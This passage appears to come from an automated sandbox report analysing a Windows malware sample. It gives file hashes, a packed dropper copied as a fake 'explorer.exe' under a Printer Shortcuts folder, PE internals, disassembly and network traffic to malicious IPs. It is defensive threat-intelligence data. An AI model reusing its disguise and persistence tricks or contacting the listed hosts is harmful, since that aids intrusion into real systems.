                                                                                                                                                                                • 162.159.135.233
                                                                                                                                                                                • 45.130.41.15
                                                                                                                                                                                AU10exmBfE.exeGet hashmaliciousBrowse
                                                                                                                                                                                • 162.159.135.233
                                                                                                                                                                                • 45.130.41.15
                                                                                                                                                                                ORDEN DE COMPRA-34002174,pdf.exeGet hashmaliciousBrowse
                                                                                                                                                                                • 162.159.135.233
                                                                                                                                                                                • 45.130.41.15
                                                                                                                                                                                New_771008123115.exeGet hashmaliciousBrowse
                                                                                                                                                                                • 162.159.135.233
                                                                                                                                                                                • 45.130.41.15
                                                                                                                                                                                60852000010.exeGet hashmaliciousBrowse
                                                                                                                                                                                • 162.159.135.233
                                                                                                                                                                                • 45.130.41.15
                                                                                                                                                                                3afitgpkKN.exeGet hashmaliciousBrowse
                                                                                                                                                                                • 162.159.135.233
                                                                                                                                                                                • 45.130.41.15
                                                                                                                                                                                FATTURA_46082_ELEPHANTSCAVI-scan.vbsGet hashmaliciousBrowse
                                                                                                                                                                                • 162.159.135.233
                                                                                                                                                                                • 45.130.41.15
                                                                                                                                                                                LmZI8Fa6nY.exeGet hashmaliciousBrowse
                                                                                                                                                                                • 162.159.135.233
                                                                                                                                                                                • 45.130.41.15
                                                                                                                                                                                OblXJ18reE.exeGet hashmaliciousBrowse
                                                                                                                                                                                • 162.159.135.233
                                                                                                                                                                                • 45.130.41.15

                                                                                                                                                                                Dropped Files

                                                                                                                                                                                No context

                                                                                                                                                                                Created / dropped Files

                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\MVB56JJDeJ.exe.log
                                                                                                                                                                                Process:C:\Users\user\Desktop\MVB56JJDeJ.exe
                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):2291
                                                                                                                                                                                Entropy (8bit):5.3192079301865585
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:48:MOfHK5HKXAHKhBHKdHKB1AHKzvQTHmYHKhQnoPtHoxHImHKYHZHjHK1HxLHG1qHu:vq5qXAqLqdqUqzcGYqhQnoPtIxHbqY5J
                                                                                                                                                                                MD5:4BADB969693339E0168337CA99ECD34A
                                                                                                                                                                                SHA1:1E1B40CD35C09FBDBDB7EC399DD84B982D9D18B7
                                                                                                                                                                                SHA-256:60610B9BD290B96D8D3D657D245D3CBEE4922A76398E2A42236F1106133C91CE
                                                                                                                                                                                SHA-512:414476A7C0173846AB7142E09E4F5902392DA6CA1EB2A7A67C6618976DCAD924E943FDF14AE8E40D1D80FE57947F310D57E3CC755864B32FB681440842486786
                                                                                                                                                                                Malicious:true
                                                                                                                                                                                Reputation:moderate, very likely benign file
                                                                                                                                                                                Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.ServiceModel, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"SMDiagnostics, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..2,"System.IdentityModel, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System.Runtime.Serialization, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Runteb92aa12#\34957343ad5d84daee97a1affda91665\System.Runtime.Serialization.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\b219d4630d26b88041b59c21e8e2b95c\System.Xml.ni.dll",0..2,"System.ServiceModel.Internals, Version=4.0.0.0, Culture=
                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\123.exe
                                                                                                                                                                                Process:C:\Users\user\Desktop\MVB56JJDeJ.exe
                                                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):3432464
                                                                                                                                                                                Entropy (8bit):7.933848828440689
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:49152:/kuKHSU/HdqR65oNfjhYjK4p0heHH5MAA3pYDi1X5ScACUtkTfqq3iKjypFiO:/CyIjyNfgCMBAZJ5fACUWqq35jyqO
                                                                                                                                                                                MD5:8A0FAE504673180E1BB94C93260C2D7F
                                                                                                                                                                                SHA1:CD40CA333DE4FD089AAC8F3860A87E5D55074FCD
                                                                                                                                                                                SHA-256:05F947D8923A8D5ED24CB33D205E1F3602EF91A82210F9FBE8F2342F45BD6072
                                                                                                                                                                                SHA-512:0E54FD0ED023DF7E800C2EE65AEFA138DFD4843891B6E28D5DC3478EE1A0E4326412F7622FF0C69ACF104C9C8FF0A4621580D54C59F6B83D087871EFDB4CA6D0
                                                                                                                                                                                Malicious:true
                                                                                                                                                                                Antivirus:
                                                                                                                                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                • Antivirus: Metadefender, Detection: 29%, Browse
                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 39%
                                                                                                                                                                                Reputation:low
                                                                                                                                                                                Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....ia.................:..........0.Q.. ...`....@.. ....................... }.......5...@.................................:...P.....x..o...........R4............................................................................................. .@... ...................... ..` .2...`......................@..@ ............................@..@.idata... ..........................@........ ..........................@..@.themida..A.........................`....boot.....&...Q...&.................`..`....P.....x......./............. ..`.rsrc....o....x..p..../.............@..@........................................................................................................................................................................................................................................................................
                                                                                                                                                                                C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\7a0fd90576e08807bde2cc57bcf9854bbce05fe3
                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\123.exe
                                                                                                                                                                                File Type:ASCII text, with very long lines, with no line terminators
                                                                                                                                                                                Category:modified
                                                                                                                                                                                Size (bytes):958
                                                                                                                                                                                Entropy (8bit):5.900366841781564
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:24:ltB4sq/UoijycULQp/xihVp9F8OhAzo5whhSvEtW:l+iWHLWpU85hGV
                                                                                                                                                                                MD5:DB2F7427FCE3B50F26464A546F9A1DB1
                                                                                                                                                                                SHA1:BD5C07D131AE36FFBEF3D9DC872B598E6997E564
                                                                                                                                                                                SHA-256:AC7BA93A20550B28C03E13058D88238A35EFDCF84A602DED73F33F7896118B05
                                                                                                                                                                                SHA-512:79CB846D6241DAFDF1189749A95261101DA03A6C2F852953B0FD0B8898D6FDC9FBD6833FEB0A335532B3A578545DE7EDC6A68B1A6EDFEBD7A39C62E09FEE2AFE
                                                                                                                                                                                Malicious:false
                                                                                                                                                                                Reputation:low
                                                                                                                                                                                Preview: WjYOLZSB77F5u0uXmIxacrRU6Ya2tl6UFIMez3tY6E5R358D1snh4pepRDRw9ZSWAv0lnPhsZZdYv9aBaWBA8ZZaohMvm6YhviRIEWZlK4IfLF3SnPVmXRYlVa7GDwGcA6nMsS6E7Z0DR4Pin3IWlwJdKpwoZThYypfOcqjVTRp8bUUbLYcJot1NwJCDfSpo1bPmYAG6UxDTGLB0VVdA0YuExRcSogzBmBGAEsDKRfz0qiHlILrKyoxdrLyGiySy7CrFEBvnSSsUi3XOK0JdypM7NnT336mdNB3o0BhHaE2f5d4xxj6rpy9Rzt1as2tVqPGh9sYITCDtxrCutfFT95yZBmzHJGZiUgypWWyFLxYmvQeHrHrMwaWvbrgX3Q9MneYQ2WXWrAHMgLnuHraCZMv4KDOp0aL5yL9Q2NPUuVfvTKOQEwPL07xbteGyIsgQyLYVMW24cFRDqAkAz8lEK9F1XhhYGaMCzP6Hv3Dr3Vtuptus3G9KGbFzGh7oyexB3PObDdO643KzQVLnxye9bC5XJHBO5Y3Zhr1ZfTpa2DPNRQivVT199xk0U1R6b9AfAvRidwIdJEGXwrG2iQ3lh3ZuHAEnBt83CtNg9ARiKY05qMDnvYXLFZ8GVhbdrebZFNVDdj3i8VaICeD46b2nWxynvGKciy0q6azd1AJLfzNu8zE0ehgQmyDSZsRWYb9KeuMlojD5SrIhkEo5CU8BRkDIXhEIswwDzCPNncL4dk85qgsVDVUEd723rEOHf4Nf4ErhybSjIDhqmIb0ytEXcrk1JVgiODZiXcAmzLgmDu6ZZMRimXTw0zDMdzXc5tVEo8TKHzBnMcTrvLc7E760unshYyI9xEqTZ1va2HawWpjXgWaRXZY7xeTAQvvTqB0IvAS3aBE7gJeEDVBCX0mXpsg4huKHWGGUzblfDh1VVbanAO75ts6zZccCeXVp07
                                                                                                                                                                                C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\explorer.exe
                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\123.exe
                                                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):3432464
                                                                                                                                                                                Entropy (8bit):7.933848828440689
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:49152:/kuKHSU/HdqR65oNfjhYjK4p0heHH5MAA3pYDi1X5ScACUtkTfqq3iKjypFiO:/CyIjyNfgCMBAZJ5fACUWqq35jyqO
                                                                                                                                                                                MD5:8A0FAE504673180E1BB94C93260C2D7F
                                                                                                                                                                                SHA1:CD40CA333DE4FD089AAC8F3860A87E5D55074FCD
                                                                                                                                                                                SHA-256:05F947D8923A8D5ED24CB33D205E1F3602EF91A82210F9FBE8F2342F45BD6072
                                                                                                                                                                                SHA-512:0E54FD0ED023DF7E800C2EE65AEFA138DFD4843891B6E28D5DC3478EE1A0E4326412F7622FF0C69ACF104C9C8FF0A4621580D54C59F6B83D087871EFDB4CA6D0
                                                                                                                                                                                Malicious:true
                                                                                                                                                                                Antivirus:
                                                                                                                                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                • Antivirus: Metadefender, Detection: 29%, Browse
                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 39%
                                                                                                                                                                                Reputation:low
                                                                                                                                                                                Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....ia.................:..........0.Q.. ...`....@.. ....................... }.......5...@.................................:...P.....x..o...........R4............................................................................................. .@... ...................... ..` .2...`......................@..@ ............................@..@.idata... ..........................@........ ..........................@..@.themida..A.........................`....boot.....&...Q...&.................`..`....P.....x......./............. ..`.rsrc....o....x..p..../.............@..@........................................................................................................................................................................................................................................................................

                                                                                                                                                                                Static File Info

                                                                                                                                                                                General

                                                                                                                                                                                File type:PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                                                                                                                Entropy (8bit):6.804534643810526
                                                                                                                                                                                TrID:
                                                                                                                                                                                • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                                                                                • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                                                                • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                                                                • VXD Driver (31/22) 0.00%
                                                                                                                                                                                • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                                                File name:MVB56JJDeJ.exe
                                                                                                                                                                                File size:843264
                                                                                                                                                                                MD5:e551858d7c25a5874ac81a13ca3ca24d
                                                                                                                                                                                SHA1:a8b4217a9e68264e72c416b5c33dbc403c7acd3c
                                                                                                                                                                                SHA256:f9349003a92f82606eede0b5ebd94af025f1a2a76a481df38075723e3af054be
                                                                                                                                                                                SHA512:18be299b1156c490b381aa5b385a899113cf2c97225e01bb4120a4c1671d74496180495902603d0c34755040f1f54dbf682398b56d39ea1d47c0e74b109c644b
                                                                                                                                                                                SSDEEP:24576:JpvpuWmWKD9dFEU2RaUZtDi094WoH3jnF:PrmWenUzu094tX5
                                                                                                                                                                                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....sma.................z........................P..........................@................ ............................

                                                                                                                                                                                File Icon

                                                                                                                                                                                Icon Hash:b26c94aa8ca2cc26

                                                                                                                                                                                Static PE Info

                                                                                                                                                                                General

                                                                                                                                                                                Entrypoint:0x501300
                                                                                                                                                                                Entrypoint Section:.text
                                                                                                                                                                                Digitally signed:false
                                                                                                                                                                                Imagebase:0x500000
                                                                                                                                                                                Subsystem:windows gui
                                                                                                                                                                                Image File Characteristics:LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, DEBUG_STRIPPED, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
                                                                                                                                                                                DLL Characteristics:
                                                                                                                                                                                Time Stamp:0x616D73F3 [Mon Oct 18 13:17:39 2021 UTC]
                                                                                                                                                                                TLS Callbacks:0x586710, 0x5866c0
                                                                                                                                                                                CLR (.Net) Version:
                                                                                                                                                                                OS Version Major:4
                                                                                                                                                                                OS Version Minor:0
                                                                                                                                                                                File Version Major:4
                                                                                                                                                                                File Version Minor:0
                                                                                                                                                                                Subsystem Version Major:4
                                                                                                                                                                                Subsystem Version Minor:0
                                                                                                                                                                                Import Hash:4aa82b91dfdd0eea976043de209425e6

                                                                                                                                                                                Entrypoint Preview

                                                                                                                                                                                Instruction
                                                                                                                                                                                sub esp, 1Ch
                                                                                                                                                                                mov dword ptr [esp], 00000002h
                                                                                                                                                                                call dword ptr [005BA1A8h]
                                                                                                                                                                                call 00007FAE309F4170h
                                                                                                                                                                                lea esi, dword ptr [esi+00h]
                                                                                                                                                                                lea edi, dword ptr [edi+00000000h]
                                                                                                                                                                                jmp dword ptr [005BA1D8h]
                                                                                                                                                                                lea esi, dword ptr [esi+00h]
                                                                                                                                                                                lea edi, dword ptr [edi+00000000h]
                                                                                                                                                                                jmp dword ptr [005BA1C4h]
                                                                                                                                                                                nop
                                                                                                                                                                                nop
                                                                                                                                                                                nop
                                                                                                                                                                                nop
                                                                                                                                                                                nop
                                                                                                                                                                                nop
                                                                                                                                                                                nop
                                                                                                                                                                                nop
                                                                                                                                                                                nop
                                                                                                                                                                                nop
                                                                                                                                                                                push ebp
                                                                                                                                                                                mov ebp, esp
                                                                                                                                                                                push esi
                                                                                                                                                                                push ebx
                                                                                                                                                                                sub esp, 10h
                                                                                                                                                                                mov dword ptr [esp], 005B7000h
                                                                                                                                                                                call 00007FAE30A7B7C1h
                                                                                                                                                                                sub esp, 04h
                                                                                                                                                                                test eax, eax
                                                                                                                                                                                je 00007FAE309F4387h
                                                                                                                                                                                mov dword ptr [esp], 005B7000h
                                                                                                                                                                                mov ebx, eax
                                                                                                                                                                                call 00007FAE30A7B780h
                                                                                                                                                                                sub esp, 04h
                                                                                                                                                                                mov dword ptr [005B906Ch], eax
                                                                                                                                                                                mov dword ptr [esp+04h], 005B7013h
                                                                                                                                                                                mov dword ptr [esp], ebx
                                                                                                                                                                                call 00007FAE30A7B780h
                                                                                                                                                                                sub esp, 08h
                                                                                                                                                                                mov esi, eax
                                                                                                                                                                                mov dword ptr [esp+04h], 005B7029h
                                                                                                                                                                                mov dword ptr [esp], ebx
                                                                                                                                                                                call 00007FAE30A7B76Bh
                                                                                                                                                                                sub esp, 08h
                                                                                                                                                                                mov dword ptr [00589000h], eax
                                                                                                                                                                                test esi, esi
                                                                                                                                                                                je 00007FAE309F42E3h
                                                                                                                                                                                mov dword ptr [esp+04h], 005B9008h
                                                                                                                                                                                mov dword ptr [esp], 005B80B8h
                                                                                                                                                                                call esi
                                                                                                                                                                                mov eax, dword ptr [005B6218h]
                                                                                                                                                                                test eax, eax
                                                                                                                                                                                je 00007FAE309F430Ch
                                                                                                                                                                                mov dword ptr [esp], 005B7041h

                                                                                                                                                                                Data Directories

                                                                                                                                                                                NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_IMPORT0xba0000x61c.idata
                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_RESOURCE0xbd0000x16e7c.rsrc
                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_TLS0xbc0040x18.tls
                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_IAT0xba1340xe4.idata
                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                                                                                Sections

                                                                                                                                                                                NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                                                .text0x10000x878d40x87a00False0.433924971198data5.8724748639IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_2048BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_8BYTES, IMAGE_SCN_CNT_CODE, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_MEM_READ
                                                                                                                                                                                .data0x890000x2d21c0x2d400False0.997998316644data7.99773935078IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_2BYTES, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_512BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_MEM_READ
                                                                                                                                                                                .rdata0xb70000x2f00x400False0.2802734375data4.09696984439IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_2BYTES, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_512BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_MEM_READ
                                                                                                                                                                                .eh_fram0xb80000xa040xc00False0.353190104167data4.36844685706IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_2BYTES, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_512BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_MEM_READ
                                                                                                                                                                                .bss0xb90000xa80x0False0empty0.0IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_2BYTES, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_512BYTES, IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_MEM_READ
                                                                                                                                                                                .idata0xba0000x61c0x800False0.35546875data4.23147780084IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_2BYTES, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_512BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_MEM_READ
                                                                                                                                                                                .CRT0xbb0000x180x200False0.046875data0.118369631259IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_2BYTES, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_512BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_MEM_READ
                                                                                                                                                                                .tls0xbc0000x200x200False0.05859375data0.22482003451IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_2BYTES, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_512BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_MEM_READ
                                                                                                                                                                                .rsrc0xbd0000x16e7c0x17000False0.63230298913data6.7460240292IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                                                                                                                                                                Resources

                                                                                                                                                                                NameRVASizeTypeLanguageCountry
                                                                                                                                                                                RT_ICON0xbd3a00xaf42PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                RT_ICON0xc82e40x4228dBase IV DBT of \200.DBF, blocks size 0, block length 16384, next free block index 40, next free block 4278351805, next used block 4278351805
                                                                                                                                                                                RT_ICON0xcc50c0x25a8dBase IV DBT of `.DBF, block length 9216, next free block index 40, next free block 4278351805, next used block 4278351805
                                                                                                                                                                                RT_ICON0xceab40xea8data
                                                                                                                                                                                RT_ICON0xcf95c0x668data
                                                                                                                                                                                RT_ICON0xcffc40x10a8dBase IV DBT of @.DBF, block length 4096, next free block index 40, next free block 4278351805, next used block 4278351805
                                                                                                                                                                                RT_ICON0xd106c0x8a8dBase IV DBT of @.DBF, block length 1024, next free block index 40, next free block 0, next used block 0
                                                                                                                                                                                RT_ICON0xd19140x2e8dBase IV DBT of @.DBF, block length 512, next free block index 40, next free block 2449461077, next used block 286331153
                                                                                                                                                                                RT_ICON0xd1bfc0x988data
                                                                                                                                                                                RT_ICON0xd25840x6c8data
                                                                                                                                                                                RT_ICON0xd2c4c0x1e8data
                                                                                                                                                                                RT_ICON0xd2e340x468GLS_BINARY_LSB_FIRST
                                                                                                                                                                                RT_ICON0xd329c0x568GLS_BINARY_LSB_FIRST
                                                                                                                                                                                RT_ICON0xd38040x128GLS_BINARY_LSB_FIRST
                                                                                                                                                                                RT_GROUP_ICON0xd392c0xcadata
                                                                                                                                                                                RT_VERSION0xd39f80x2d0dataEnglishUnited States
                                                                                                                                                                                RT_MANIFEST0xd3cc80x1b1XML 1.0 document, ASCII text, with very long lines, with no line terminators

                                                                                                                                                                                Imports

                                                                                                                                                                                DLLImport
                                                                                                                                                                                KERNEL32.dllCreateThread, DeleteCriticalSection, EnterCriticalSection, ExitProcess, FindClose, FindFirstFileA, FindNextFileA, FreeLibrary, GetCommandLineA, GetLastError, GetModuleHandleA, GetModuleHandleW, GetProcAddress, InitializeCriticalSection, LeaveCriticalSection, LoadLibraryA, SetUnhandledExceptionFilter, TlsGetValue, VirtualProtect, VirtualQuery, WaitForSingleObject
                                                                                                                                                                                msvcrt.dll_strdup, _stricoll
                                                                                                                                                                                msvcrt.dll__getmainargs, __mb_cur_max, __p__environ, __p__fmode, __set_app_type, _cexit, _errno, _fpreset, _fullpath, _iob, _isctype, _onexit, _pctype, _setmode, _strdup, abort, atexit, calloc, free, fwrite, malloc, mbstowcs, memcpy, realloc, setlocale, signal, strcoll, strlen, tolower, vfprintf, wcstombs

                                                                                                                                                                                Version Infos

                                                                                                                                                                                DescriptionData
                                                                                                                                                                                LegalCopyrightAll Rights Reserved
                                                                                                                                                                                CompanyNamea8wGRn2
                                                                                                                                                                                Commentsa8wGRn2zL8XikdpdPCQXtecLryddXpIyjt7L
                                                                                                                                                                                ProductNamea8wGRn2zL8Xikd
                                                                                                                                                                                ProductVersion3.7.1.5
                                                                                                                                                                                FileDescriptiona8wGRn2zL8XikdpdPCQXtecLryddXpIyjt7LeTn3FqbpcHta7DoJl3uODP
                                                                                                                                                                                Translation0x0409 0x0514

                                                                                                                                                                                Possible Origin

                                                                                                                                                                                Language of compilation systemCountry where language is spokenMap
                                                                                                                                                                                EnglishUnited States

                                                                                                                                                                                Network Behavior

                                                                                                                                                                                Network Port Distribution

                                                                                                                                                                                TCP Packets

                                                                                                                                                                                TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                Oct 19, 2021 07:23:12.260876894 CEST4977456316192.168.2.4185.244.217.166
                                                                                                                                                                                Oct 19, 2021 07:23:12.288275003 CEST5631649774185.244.217.166192.168.2.4
                                                                                                                                                                                Oct 19, 2021 07:23:12.288439989 CEST4977456316192.168.2.4185.244.217.166
                                                                                                                                                                                Oct 19, 2021 07:23:12.522628069 CEST4977456316192.168.2.4185.244.217.166
                                                                                                                                                                                Oct 19, 2021 07:23:12.550242901 CEST5631649774185.244.217.166192.168.2.4
                                                                                                                                                                                Oct 19, 2021 07:23:12.592287064 CEST4977456316192.168.2.4185.244.217.166
                                                                                                                                                                                Oct 19, 2021 07:23:13.414973974 CEST4977456316192.168.2.4185.244.217.166
                                                                                                                                                                                Oct 19, 2021 07:23:13.444349051 CEST5631649774185.244.217.166192.168.2.4
                                                                                                                                                                                Oct 19, 2021 07:23:13.498572111 CEST4977456316192.168.2.4185.244.217.166
                                                                                                                                                                                Oct 19, 2021 07:23:20.624758005 CEST4977456316192.168.2.4185.244.217.166
                                                                                                                                                                                Oct 19, 2021 07:23:20.659403086 CEST5631649774185.244.217.166192.168.2.4
                                                                                                                                                                                Oct 19, 2021 07:23:20.659564972 CEST5631649774185.244.217.166192.168.2.4
                                                                                                                                                                                Oct 19, 2021 07:23:20.659635067 CEST5631649774185.244.217.166192.168.2.4
                                                                                                                                                                                Oct 19, 2021 07:23:20.659641981 CEST4977456316192.168.2.4185.244.217.166
                                                                                                                                                                                Oct 19, 2021 07:23:20.707264900 CEST4977456316192.168.2.4185.244.217.166
                                                                                                                                                                                Oct 19, 2021 07:23:21.252888918 CEST49775443192.168.2.445.130.41.15
                                                                                                                                                                                Oct 19, 2021 07:23:21.252929926 CEST4434977545.130.41.15192.168.2.4
                                                                                                                                                                                Oct 19, 2021 07:23:21.253031015 CEST49775443192.168.2.445.130.41.15
                                                                                                                                                                                Oct 19, 2021 07:23:21.286241055 CEST49775443192.168.2.445.130.41.15
                                                                                                                                                                                Oct 19, 2021 07:23:21.286271095 CEST4434977545.130.41.15192.168.2.4
                                                                                                                                                                                Oct 19, 2021 07:23:21.435667992 CEST4434977545.130.41.15192.168.2.4
                                                                                                                                                                                Oct 19, 2021 07:23:21.435849905 CEST49775443192.168.2.445.130.41.15
                                                                                                                                                                                Oct 19, 2021 07:23:21.435889959 CEST4434977545.130.41.15192.168.2.4
                                                                                                                                                                                Oct 19, 2021 07:23:21.436002970 CEST49775443192.168.2.445.130.41.15
                                                                                                                                                                                Oct 19, 2021 07:23:21.444569111 CEST49775443192.168.2.445.130.41.15
                                                                                                                                                                                Oct 19, 2021 07:23:21.444606066 CEST4434977545.130.41.15192.168.2.4
